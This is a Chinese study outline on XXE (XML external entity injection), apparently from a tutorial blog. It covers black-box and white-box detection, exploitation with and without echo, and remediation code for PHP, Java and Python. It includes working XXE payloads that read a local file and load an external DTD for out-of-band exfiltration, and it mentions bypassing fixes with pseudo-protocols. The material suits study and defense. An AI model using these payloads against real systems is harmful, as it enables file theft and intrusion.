-
xxe&xml
-
探针
-
黑盒
- content-type
- 获取得到Content-Type或数据类型为xml时,尝试xml语言payload进行测试
- svg&excel引用
- 数据格式
- content-type
-
白盒
- 可以通过应用功能追踪代码定位审计
- 可通过脚本特定函数搜索定位审计
- 可通过伪协议玩法绕过相关修复等
-
-
利用
-
无回显
- dtd实体带外访问,将数据参数发送
- HTTP带外访问,加载实体
- file读取文件,先读取
- 接受文件接受数据处理
-
有回显
-
file协议,读取文件
-
读取文件
- <?xml version="1.0"?>
- <!DOCTYPE xiaodi [
- <!ENTITY test SYSTEM "file:///d:/1.txt">
- ]>
- <user><username>&test;</username><password>xiaodi</password></user>
-
外部实体引用dtd
- <?xml version="1.0" ?>
- <!DOCTYPE test [
- <!ENTITY % file SYSTEM "http://127.0.0.1:80/xxe.dtd">
- %file;
- ]>
- <user><username>&send;</username><password>xiaodi</password></user>
-
- HTTP带外访问
-
- 伪装协议玩法
-
-
前置
- 缘由:传输和存储数据
- xml
- 危害:文件读取,端口探针
- 缘由:传输和存储数据
-
修复
- 禁用dtd实体引用
- 过滤关键字:<!DOCTYP <!ENTITY, SYSTEM PUBLIC
- 方案
-
禁用外部实体
- PHP
- libxml_disable_entity_loader(true);
- Java
- DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
- python
- from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
- PHP
-
- 原理及漏洞
-
XXE(XML外部实体注入)漏洞
Dawndddddd2026-01-28 8:28
相关推荐
丑八怪大丑2 天前
XML_Tomcat_HTTPlargecode3 天前
企业名称能在来电显示吗?号码显示公司名服务打通多终端展示只可远观5 天前
Android XML命令式和Jetpack Compose声明式UI鹏晨互联5 天前
《深入理解 Compose 中的 matchParentSize 与 fillMaxSize —— 从 XML 到 Compose 的对比解析》小短腿的代码世界5 天前
Qt SVG渲染管线全解析:从XML解析到像素绘制的完整架构设计与性能优化实战HMS工业网络6 天前
技术干货:EtherCAT设备ESI(XML)文件中的CompleteAccess关键字有什么作用鹏晨互联7 天前
【Compose vs XML:边框内外间距的实现对比】鹏晨互联8 天前
Jetpack Compose vs XML:fillMaxSize、fillMaxHeight、fillMaxWidth 全面对比如果'\'真能转义说9 天前
OOXML 文档格式剖析:哈希、ZIP结构与识别